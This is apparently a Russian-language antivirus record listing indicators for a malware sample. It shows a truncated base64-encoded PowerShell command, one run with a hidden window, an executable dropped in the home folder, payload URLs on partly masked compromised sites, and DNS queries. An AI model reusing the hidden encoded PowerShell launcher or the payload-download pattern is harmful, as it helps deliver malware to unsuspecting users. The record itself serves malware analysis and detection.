Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADYAMgA1ADYANwAxADEAPQAnAFcAMQA3ADYANQAwAF8AJwA7ACQAcwA3ADUAXwA3ADkAIAA9ACAAJwA5ADUAOQAnADsAJAB3ADEAOQAyADYAOAAwAD0AJwBkADIANAAyADMAMwAnADsAJABuADgAMQBfADUANwA9ACQAZQBuAHYAOgB1AHMAZQB...
- %HOMEPATH%\959.exe
- %HOMEPATH%\959.exe
- http://sa####rvicesfze.com/wp-admin/ZmVYmAXv/
- http://no######thatthanhnam.com/wp-admin/voytvHre/
- DNS ASK pr####redspeech.com
- DNS ASK ph####ingtones.info
- DNS ASK sa####rvicesfze.com
- DNS ASK fr######paperdesktop.com
- DNS ASK no######thatthanhnam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRADYAMgA1ADYANwAxADEAPQAnAFcAMQA3ADYANQAwAF8AJwA7ACQAcwA3ADUAXwA3ADkAIAA9ACAAJwA5ADUAOQAnADsAJAB3ADEAOQAyADYAOAAwAD0AJwBkADIANAAyADMAMwAnADsAJABuADgAMQBfADUANwA9ACQAZQBuAHYAOgB1AHMAZQB...' (со скрытым окном)